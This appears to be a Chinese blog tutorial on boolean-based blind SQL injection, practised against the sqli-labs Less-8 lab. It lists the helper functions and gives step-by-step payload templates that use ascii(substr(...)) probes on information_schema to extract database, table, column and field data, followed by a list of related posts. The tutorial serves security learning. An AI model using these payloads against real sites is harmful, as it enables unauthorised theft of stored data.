sql注入-3布尔盲注

最新推荐文章于 2024-01-03 21:12:35 发布
最新推荐文章于 2024-01-03 21:12:35 发布
阅读量162 收藏
点赞数 1
分类专栏: sql注入 文章标签: sql 网络安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60339103/article/details/125795153
版权
本文详细介绍了SQL布尔盲注的概念、常用函数以及利用这些函数进行盲注的步骤。布尔盲注是一种在未知数据库响应时,通过页面反应判断数据内容的注入方式。主要涉及的函数包括Length()、Substr()、Ascii()、Sleep()和If()。文章还提供了靶场实战案例,指导读者如何判断注入点、数据库名、表数量、表名、字段数以及字段数据。
摘要由CSDN通过智能技术生成

布尔盲注

布尔盲注

简介

盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间的盲注和报错的盲注。

布尔盲注需要用到的函数

Length()    //返回字符串的长度

Substr()    //截取字符串

Ascii()      //返回字符的ascii码

sleep(n)   //将程序挂起一段时间 n为n秒

if(expr1,expr2,expr3)  //判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句

ascii字符代码表图片可能不太清晰,自己找也行

靶场利用

可以利用sqli-labs-master中的less-8

布尔盲注原理

通过页面是否报错来判断语句的正确性,利用函数的特性来得到数据

布尔盲注思路总结

substr(a,b,c) 其中a表示字符串,b表示从第几位开始截取(最小值为1),c表示截取几位

limt 0,1 表示从从第一个数据开始,截取第一个数据

查看是否存在注入点–>

判断注入类型–>

查看页面是否存在输出|是否存在报错提示–>

判断数据库名长度–>and length(database())>数字

得到数据库库名–>and ascii(substr(database(),1,1))=数字

判断表的数量–>and (select count(*) from information_schema.tables where table_schema='库名')>数字

依次判断表名的长度–>and (length((select table_name from information_schema.tables where table_schema='库名' limit 0,1)))>数字

依次得到表名–>and (ascii(substr((select table_name from information_schema.tables where table_schema='库名' limit 0,1),1,1)))=数字

判断表中字段个数–>and (select count(*) from information_schema.columns where table_name='表名' and table_schema='库名')>数字

依次判断表中字段名的长度–>and (length((select column_name from information_schema.columns where table_name='表名' and table_schema='库名' limit 0,1)))>数字

依次判断表的字段名 --> and ascii(substr((select column_name from information_schema.columns where table_name='表名' and table——schema='库名' limit 0,1),1,1))=数字

依次判断字段中数据的长度–>and (length((select 字段名 from 表名 limit 0,1)))>数字

依次得到字段中的数据–>and ascii(substr((select 字段名 from 表名 limit 0,1 ),1,1)))=x

技术骨干小李
关注
专栏目录
网络安全自学教程》- SQL注入布尔盲注原理+步骤+实战操作
wangyuxiang946的博客
05-13 4754
这篇文章为大家解析布尔盲注实现原理,结合实战案例讲解布尔盲注使用步骤
SQL注入-基于布尔盲注
xdjxi的博客
02-18 637
实验目的 了解布尔盲注技术的运用场景及条件,熟悉length()、substr()、ascii()等函数的用法,掌握基于布尔盲注基本流程。 实验步骤 本实验的目标是:以SQLi-Labs网站的Less-8为入口,利用基于布尔盲注方式获取SQLi-Labs网站的登录用户名和密码。 1.访问SQLi-Labs 网站 在攻击机 Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs 上的SQLi-Labs 网站Less-8。访问的URL为: http://[靶机IP]/s
SQL注入布尔盲注
qq_45557130的博客
10-04 789
sql注入布尔盲注
SQL注入-布尔盲注
weixin_45095113的博客
03-12 777
布尔盲注
SQL注入——布尔盲注
rane的博客
03-18 264
盲注 可以进行SQL注入,但是不能通过SQL注入漏洞看到数据库中的信息,但是可以通过真假判断数据库中的信息 布尔盲注的方法: 构造逻辑判断语句,判断信息的真假,取出所有的真值 以Less-8为例 还是老步骤,初步判断是否存在SQL注入漏洞 http://127.0.0.1/Less-8/?id=1返回You are in… http://127.0.0.1/Less-8/?id=1’无返回 可以初...
SQL注入之基于布尔盲注详解
09-10
布尔SQL注入是一种特殊的SQL注入方式,它发生在服务器对用户输入的数据进行响应时,并不会返回完整的数据库信息,而是仅返回“真”(True)或“假”(False)的反馈。这种方式使得攻击者需要根据系统对正确或错误...
sql注入-布尔盲注脚本
m0_58853680的博客
01-03 430
获取cms_users表中的username和password字段的值,并用冒号分隔(使用。USER_AGENT:模拟浏览器请求时使用的User-Agent头信息。实时打印已获取的部分数据库名,并在获取完整个名字后显示最终结果。若成功获取到长度不为None,则调用get_database_获取名为cms_users表的所有列名(同样使用group_接收一个参数content_length表示数据库名的长度。该函数利用SQL注入漏洞尝试获取数据库名或表名的长度。获取当前数据库中的所有表名(使用group_
ctfhub-sql布尔盲注
god_001的博客
06-01 683
打开网址,先输入: 得到:输入: 得到:看出可以布尔盲注查看当前表名: 于是先得到当前数据库种包含的表名: 得到: 再查看表格flag包含的字段: 得到: 于是最后一步读取flag表种flag字段的内容: 得到:
SQL注入-布尔盲注
acepanhuan的博客
02-10 1724
学习SQL注入方法之盲注
sql注入布尔盲注
qq_45927819的博客
06-25 1459
文章目录布尔盲注原理sqli-labs-less8burpsuite爆破数据库名(一)burpsuite爆破数据库名(二) 盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入布尔盲注 原理 注入的时候只会返回True和False,所以布尔盲注就是根据页面显示的是True还是False进行猜测数据库中的信息。 布尔盲注需要几个函数的辅助,就先来了解一下这几个函数 length()函数可返回字符串的长度 substring()函数可以截取字符串,可指定开始的位置和
sql注入布尔盲注
笔墨稠思
11-13 173
什么是盲注? 所谓盲注,就是在服务器没有错误回显的时候完成注入攻击 什么是布尔盲注? 布尔,这个词很明显,他会根据我们输入的注入信息,返回True和False,没有其他的任何报错信息 实现布尔盲注需要利用一下几个函数 length() 返回字符串长度 substr() 截取字符串 ascii() 返回字符的ascii码 靶场实战: 我们发现这个靶场为get传参,参数为id = 1 首先我们判断是否存在注入 我们把传参改为id = 2 - 1 发现数据返
SQL注入布尔盲注
秋水的博客
08-31 5835
布尔盲注简介 简介及使用场景: 在刚开始接触一个概念时,我们很容易顾名思义,所以在学习盲注之前的一段时间,着实不清楚盲注到底是什么。 我的理解中盲注的本质就是,在页面无法给我提供回显的时候的一中继续注入的手段。那什么是布尔盲注呢?在我们输入and 1或者and 0,浏览器返回给我们两个不同的页面,而我们就可以根据返回的页面来判断正确的数据信息。 相关函数 length()函数: ...
sql注入布尔盲注流程
最新发布
06-28
SQL注入布尔盲注是一种利用SQL注入技术来检测查询结果是否满足某个条件的攻击方法,它通常在应用程序中用于验证用户输入时使用。以下是SQL注入布尔盲注的基本流程: 1. **识别可注入点**:攻击者首先尝试找出页面上...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

技术骨干小李

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值